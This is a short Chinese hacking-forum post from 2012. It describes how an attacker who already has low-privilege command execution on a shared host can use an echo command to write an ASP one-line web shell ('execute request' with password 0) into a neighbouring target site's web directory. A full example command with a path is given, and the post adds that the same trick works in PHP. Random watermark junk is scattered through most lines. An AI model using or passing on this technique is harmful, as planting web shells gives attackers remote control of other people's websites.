在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。& n' g5 y# ?4 o- v% E0 W7 H
! a. ?% b0 z: E, g: Y8 X命令格式
. @8 y) b. ~) @1 v7 K" z2 P7 g0 B, r) E8 v6 }& j
Echo 语句 >目标站绝对目录1 O0 Z5 G* R5 N9 h2 U1 A
2 R) P# A e9 D8 j8 q i: K例如: 9 d I2 W8 C# o* n$ C0 c* o0 Q& L$ }
+ ~1 R8 D f5 p; |4 ?& W1 ]
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
! {: U! J3 e4 T3 n, ^
. c$ i! F6 v- a t这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。. T: q6 J; O. g5 A: j _
|
发表于 2012-9-23 14:40:24
收藏
支持
反对